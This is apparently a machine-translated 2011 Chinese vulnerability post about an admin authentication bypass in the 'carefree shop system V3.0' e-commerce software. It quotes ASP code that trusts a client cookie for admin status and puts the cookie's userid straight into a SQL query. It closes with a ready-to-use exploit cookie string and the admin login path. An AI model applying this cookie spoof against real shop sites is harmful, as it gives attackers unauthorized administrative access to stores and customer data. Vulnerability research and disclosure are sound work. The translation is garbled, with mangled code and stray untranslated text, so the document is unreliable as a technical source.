Genuine carefree shop system V3. 0 COOKIE spoofing vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201128845
Type myhack58
Reporter 佚名
Modified 2011-01-14T00:00:00


OK to begin, this is a shop, originally I wanted to go first injection, it is injected are filtered. So I came back, looked under the detection file, the tragedy of the thus generated: Vulnerability file: checkadmin. asp <% if request. cookies("buyok")("admin")="" then response. write "<meta http-equiv='refresh' content='0;URL=../admin. asp'>" %>

We see here a certain thought is very simple. directly to the COOKIE trick can be the background, if really so I'm not up to it! Leave a suspense let everyone go try. Then I go into the background,自动跟我弹了回来 the. I was just depressed. Continue to look at the code. index. asp <!--# include file="checkadmin. asp" - > <HTML> <HEAD> <TITLE>shop management background</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <LINK href="manage. css" type=text/css rel=stylesheet> <script language='javascript'> if (top != self)top. location. href = "index. asp"; </script> <base target="right"> </HEAD> <frameset rows="2 5," framespacing="0" border="0" frameborder="0"> <frame name="frame_top" src="top. asp" noresize> <FRAMESET border=0 frameSpacing=0 frameBorder=0 cols=2 0 0,> <FRAME name="left" marginWidth=0 marginHeight=0 src="left. asp" noResize target="right" scrolling="auto"> <FRAME name="right" marginWidth=2 0 marginHeight=2 0 src="main. asp" noResize target="right" scrolling="yes"> </FRAMESET> <NOFRAMES> <body topmargin="0" leftmargin="0"> <p>this page uses frames, but your browser does not support frames.& lt;/p> </body> </NOFRAMES> </frameset> </HTML>

See here I strange, is to call checkadmin. asp. why not get into the background. I saw the main. asp. Continue to follow up. The code is not made so much, finally found a file. Vulnerability file: include\buyok_functions. asp The following posted part of the code: set rscheck=conn. execute("select * from buyok_user where UserId='"&request. cookies("buyok")("userid")&"'") if rscheck. eof and rscheck. bof then response. write "<script language='javascript'>" response. write "alert('sorry, you are not registered or logged in.');" response. write "location. href='javascript:history. go(-1)';" response. write "</script>" response. end

See everyone here know! Oh~ you! OK to attach a EXP: the KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin; Modify the COOKIE and then directly into the asp. Background: http://localhost/admin/login.asp

Author: wind of legend